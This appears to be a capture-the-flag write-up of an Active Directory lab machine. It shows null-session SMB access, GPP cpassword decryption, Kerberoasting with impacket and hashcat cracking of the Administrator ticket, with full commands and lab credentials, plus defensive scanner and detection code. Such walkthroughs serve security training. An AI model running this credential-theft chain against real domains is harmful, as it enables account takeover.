1. Reconnaissance
1.1. nmap
The nmap scan turned up nothing out of the ordinary.
┌──(root㉿kali)-[/home/kali/labs/active/active-2]
└─# nmap -sC -sV 10.129.48.114
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-29 10:15 +04
Nmap scan report for 10.129.48.114
Host is up (0.36s latency).
Not shown: 982 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open tcpwrapped
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49167/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-12-29T06:22:44
|_ start_date: 2025-12-29T06:02:47
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 534.41 seconds
1.2. SMB check
We started with the most basic check, the shared folders, and smbmap showed that the Replication share is readable over a null session (no credentials supplied).
┌──(root㉿kali)-[/home/kali]
└─# smbmap -H 10.129.48.114
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.129.48.114:445 Name: 10.129.48.114 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
[*] Closed 1 connections
1.3. Retrieving files with smbclient
We collect the files with smbclient. Going through every file, the folder structure turns out to be that of Group Policy Preferences (GPP). From here we retrieve the Groups.xml file.
┌──(root㉿kali)-[/home/kali]
└─# smbclient -N //10.129.48.114/Replication
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 21 14:37:44 2018
.. D 0 Sat Jul 21 14:37:44 2018
active.htb D 0 Sat Jul 21 14:37:44 2018
5217023 blocks of size 4096. 225278 blocks available
smb: \> recurse ON
smb: \> ls
. D 0 Sat Jul 21 14:37:44 2018
.. D 0 Sat Jul 21 14:37:44 2018
active.htb D 0 Sat Jul 21 14:37:44 2018
\active.htb
. D 0 Sat Jul 21 14:37:44 2018
.. D 0 Sat Jul 21 14:37:44 2018
DfsrPrivate DHS 0 Sat Jul 21 14:37:44 2018
Policies D 0 Sat Jul 21 14:37:44 2018
scripts D 0 Wed Jul 18 22:48:57 2018
[...SNIP...]
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups
. D 0 Sat Jul 21 14:37:44 2018
.. D 0 Sat Jul 21 14:37:44 2018
Groups.xml A 533 Thu Jul 19 00:46:06 2018
\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT
. D 0 Sat Jul 21 14:37:44 2018
.. D 0 Sat Jul 21 14:37:44 2018
SecEdit D 0 Sat Jul 21 14:37:44 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit
. D 0 Sat Jul 21 14:37:44 2018
.. D 0 Sat Jul 21 14:37:44 2018
GptTmpl.inf A 1098 Wed Jul 18 22:49:12 2018
\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit
. D 0 Sat Jul 21 14:37:44 2018
.. D 0 Sat Jul 21 14:37:44 2018
GptTmpl.inf A 3722 Wed Jul 18 22:49:12 2018
5217023 blocks of size 4096. 207035 blocks available
smb: \> cd \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
1.4. Obtaining credentials from Groups.xml
Downloading and inspecting the file reveals the account details for SVC_TGS together with its password value, edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ.
┌──(root㉿kali)-[/home/kali]
└─# cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
1.5. Decryption with gpp-decrypt
It is clear that the password is not plaintext: GPP applies its own encryption to the value, and it has to be decrypted with the gpp-decrypt tool. The AES key for this scheme is publicly documented by Microsoft, which is why anyone who can read the file can recover the value. Decrypting it yields the following plaintext password.
┌──(root㉿kali)-[/home/kali]
└─# gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
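From the defender's side, the finding in sections 1.4 and 1.5 reduces to one check: does any GPP XML under SYSVOL still carry a cpassword attribute? The following scanner is an added example, not code from the original writeup; it assumes a locally copied SYSVOL/Replication tree, and the embedded sample is the Groups.xml retrieved above.

```python
"""Scan Group Policy Preference XML files for embedded cpassword attributes.

Added example, not part of the original writeup. Works on a locally copied
SYSVOL/Replication tree; the sample below is the Groups.xml shown above.
"""
import os
import sys
import xml.etree.ElementTree as ET

# GPP item files that are known to carry a cpassword attribute.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

# Constructed sample: the Groups.xml retrieved from the Replication share.
SAMPLE_GROUPS_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>"""


def find_cpasswords(xml_text, source="<memory>"):
    """Return one finding per Properties element with a non-empty cpassword."""
    findings = []
    root = ET.fromstring(xml_text)
    for parent in root.iter():            # User, Service, Task, Drive, ...
        for props in parent:
            cpw = props.get("cpassword")
            if not cpw:
                continue
            # The account lives on Properties (userName/runAs/accountName);
            # fall back to the item's own name attribute.
            account = (props.get("userName") or props.get("runAs")
                       or props.get("accountName") or parent.get("name", ""))
            findings.append({"file": source, "item": parent.tag, "account": account,
                             "changed": parent.get("changed", ""), "cpassword": cpw})
    return findings


def scan_sysvol(root_dir):
    """Walk a copied SYSVOL/Replication tree and collect every finding."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if name in GPP_FILES:
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8-sig") as fh:   # GPP XML is UTF-8 with BOM
                    findings.extend(find_cpasswords(fh.read(), path))
    return findings


if __name__ == "__main__":
    hits = scan_sysvol(sys.argv[1]) if len(sys.argv) > 1 else find_cpasswords(SAMPLE_GROUPS_XML, "Groups.xml")
    for h in hits:
        print(f"{h['file']}: {h['item']} {h['account']} (changed {h['changed']}) carries a cpassword")
```

Run it with the path of a copied Replication or SYSVOL tree as the only argument; with no argument it scans the embedded sample.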
2. Internal data collection
2.1. Information gathering with the SVC_TGS account
With the SVC_TGS credentials in hand, we enumerate the shares on the internal network and identify the domain accounts.
┌──(root㉿kali)-[/home/kali]
└─# nxc smb 10.129.48.114 -u svc_tgs -p GPPstillStandingStrong2k18 --shares
SMB 10.129.48.114 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.48.114 445 DC [+] active.htb\svc_tgs:GPPstillStandingStrong2k18
SMB 10.129.48.114 445 DC [*] Enumerated shares
SMB 10.129.48.114 445 DC Share Permissions Remark
SMB 10.129.48.114 445 DC ----- ----------- ------
SMB 10.129.48.114 445 DC ADMIN$ Remote Admin
SMB 10.129.48.114 445 DC C$ Default share
SMB 10.129.48.114 445 DC IPC$ Remote IPC
SMB 10.129.48.114 445 DC NETLOGON READ Logon server share
SMB 10.129.48.114 445 DC Replication READ
SMB 10.129.48.114 445 DC SYSVOL READ Logon server share
SMB 10.129.48.114 445 DC Users READ
┌──(root㉿kali)-[/home/kali]
└─# nxc smb 10.129.48.114 -u svc_tgs -p GPPstillStandingStrong2k18 --users
SMB 10.129.48.114 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.48.114 445 DC [+] active.htb\svc_tgs:GPPstillStandingStrong2k18
SMB 10.129.48.114 445 DC -Username- -Last PW Set- -BadPW- -Description-
SMB 10.129.48.114 445 DC Administrator 2018-07-18 19:06:40 0 Built-in account for administering the computer/domain
SMB 10.129.48.114 445 DC Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.129.48.114 445 DC krbtgt 2018-07-18 18:50:36 0 Key Distribution Center Service Account
SMB 10.129.48.114 445 DC SVC_TGS 2018-07-18 20:14:38 0
SMB 10.129.48.114 445 DC [*] Enumerated 4 local users: ACTIVE
2.2. Exploring the Users share
Since the Users share grants READ permission, we access it and retrieve the user.txt flag.
┌──(root㉿kali)-[/home/kali]
└─# smbclient //10.129.48.114/Users -U svc_tgs%GPPstillStandingStrong2k18
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Jul 21 18:39:20 2018
.. DR 0 Sat Jul 21 18:39:20 2018
Administrator D 0 Mon Jul 16 14:14:21 2018
All Users DHSrn 0 Tue Jul 14 09:06:44 2009
Default DHR 0 Tue Jul 14 10:38:21 2009
Default User DHSrn 0 Tue Jul 14 09:06:44 2009
desktop.ini AHS 174 Tue Jul 14 08:57:55 2009
Public DR 0 Tue Jul 14 08:57:55 2009
SVC_TGS D 0 Sat Jul 21 19:16:32 2018
5217023 blocks of size 4096. 279654 blocks available
smb: \> cd svc_tgs
smb: \svc_tgs\> ls
. D 0 Sat Jul 21 19:16:32 2018
.. D 0 Sat Jul 21 19:16:32 2018
Contacts D 0 Sat Jul 21 19:14:11 2018
Desktop D 0 Sat Jul 21 19:14:42 2018
Downloads D 0 Sat Jul 21 19:14:23 2018
Favorites D 0 Sat Jul 21 19:14:44 2018
Links D 0 Sat Jul 21 19:14:57 2018
My Documents D 0 Sat Jul 21 19:15:03 2018
My Music D 0 Sat Jul 21 19:15:32 2018
My Pictures D 0 Sat Jul 21 19:15:43 2018
My Videos D 0 Sat Jul 21 19:15:53 2018
Saved Games D 0 Sat Jul 21 19:16:12 2018
Searches D 0 Sat Jul 21 19:16:24 2018
5217023 blocks of size 4096. 279654 blocks available
smb: \svc_tgs\> cd Desktop
smb: \svc_tgs\Desktop\> get user.txt
getting file \svc_tgs\Desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \svc_tgs\Desktop\>
┌──(root㉿kali)-[/home/kali]
└─# cat user.txt
3. Privilege escalation
3.1. Stealing a password hash with GetUserSPNs
GetUserSPNs is the impacket module that requests service tickets for service accounts and extracts their hashes; each ticket is encrypted with the service account's password, so the hash can be cracked offline. Here we make the request with the SVC_TGS credentials we already hold, which gives us the GetUserSPNs.out file.
┌──(root㉿kali)-[/home/kali/labs/active/active-2]
└─# impacket-GetUserSPNs -request -dc-ip 10.129.48.114 active.htb/SVC_TGS:GPPstillStandingStrong2k18 -save -outputfile GetUserSPNs.out
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 23:06:40.351723 2025-12-29 10:03:46.278540
[-] CCache file is not found. Skipping...
┌──(root㉿kali)-[/home/kali/labs/active/active-2]
└─# ls
Administrator.ccache GetUserSPNs.out Groups.xml
3.2. Cracking the GetUserSPNs.out hash
Inspecting GetUserSPNs.out shows that it contains the password hash.
┌──(root㉿kali)-[/home/kali/labs/active/active-2]
└─# cat GetUserSPNs.out
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$7220689ba00da903606f574e1ab8e0fe$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
This hash can be cracked with hashcat mode 13100 (Kerberos 5 TGS-REP, etype 23).
┌──(root㉿kali)-[/home/kali/labs/active/active-2]
└─# hashcat -m 13100 GetUserSPNs.out /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu--0x000, 2909/5883 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
[...SNIP...]
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$7220689ba00da903606f574e1ab8e0fe$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:Ticketmaster1968
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...e153e9
Time.Started.....: Mon Dec 29 11:10:17 2025 (3 secs)
Time.Estimated...: Mon Dec 29 11:10:20 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 3089.2 kH/s (0.50ms) @ Accel:512 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10539008/14344385 (73.47%)
Rejected.........: 0/10539008 (0.00%)
Restore.Point....: 10536960/14344385 (73.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Tiffany95 -> Thelittlemermaid
Hardware.Mon.#1..: Util: 78%
Started: Mon Dec 29 11:10:16 2025
Stopped: Mon Dec 29 11:10:22 2025
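The request in 3.1 leaves a trace on the domain controller: a Security event 4769 whose TicketEncryptionType is 0x17 (RC4, the etype-23 ticket that mode 13100 cracks) for a service account that is a plain user rather than a machine. The detector below is an added example, not code from the original writeup; the log lines are constructed records in a simple key=value shape using the 4769 field names, and the source address 10.10.14.5 is an assumed attacker host. On a 2008 R2-era domain RC4 tickets are routine, so the filter keys on account type and success and groups by requester rather than alerting on etype alone.

```python
"""Flag Kerberoasting-style service-ticket requests in Security event 4769.

Added example, not part of the original writeup. Input lines are constructed
'4769 key=value ...' records using the 4769 field names; etype 0x17 is RC4,
the etype-23 ticket that hashcat mode 13100 cracks.
"""
from collections import defaultdict

RC4_HMAC = "0x17"

# Constructed sample: SVC_TGS requests the SPN held by Administrator (RC4),
# plus normal AES traffic and one failed request that must not be flagged.
SAMPLE_LOG = """\
4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x17 Status=0x0 IpAddress=10.10.14.5
4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=DC$ TicketEncryptionType=0x12 Status=0x0 IpAddress=10.10.14.5
4769 TargetUserName=DC$@ACTIVE.HTB ServiceName=krbtgt TicketEncryptionType=0x12 Status=0x0 IpAddress=10.129.48.114
4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x17 Status=0x6 IpAddress=10.10.14.5
"""


def parse_4769(line):
    """Parse one 'EventID key=value ...' line into a dict."""
    event_id, _, rest = line.partition(" ")
    fields = dict(kv.split("=", 1) for kv in rest.split())
    fields["EventID"] = event_id
    return fields


def is_roast_candidate(ev):
    """Successful RC4 service ticket for a user account (not a machine, not krbtgt)."""
    svc = ev.get("ServiceName", "")
    return (ev.get("EventID") == "4769"
            and ev.get("Status") == "0x0"
            and ev.get("TicketEncryptionType", "").lower() == RC4_HMAC
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")


def find_kerberoast(log_text):
    """Group suspicious requests by (requester, source IP) -> sorted service accounts."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_4769(line)
        if is_roast_candidate(ev):
            hits[(ev["TargetUserName"], ev["IpAddress"])].add(ev["ServiceName"])
    return {key: sorted(services) for key, services in hits.items()}


if __name__ == "__main__":
    for (user, ip), services in find_kerberoast(SAMPLE_LOG).items():
        print(f"{user} from {ip} requested RC4 tickets for: {', '.join(services)}")
```

A requester that accumulates many distinct service accounts in a short window is the stronger signal; the single hit here matches the one SPN the box exposes.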
3.3. Obtaining root.txt
Once the administrator password has been cracked in step 3.2, we connect again with smbclient and retrieve root.txt.
┌──(root㉿kali)-[/home/kali/labs/active/active-2]
└─# smbclient //10.129.48.114/Users -U administrator%Ticketmaster1968
Try "help" to get a list of possible commands.
smb: \> get .\administrator\desktop\root.txt
getting file \administrator\desktop\root.txt of size 34 as .\administrator\desktop\root.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> ^C
┌──(root㉿kali)-[/home/kali/labs/active/active-2]
└─# ls
Administrator.ccache 'administrator\desktop\root.txt' GetUserSPNs.out Groups.xml
┌──(root㉿kali)-[/home/kali/labs/active/active-2]
└─# cat administrator\\desktop\\root.txt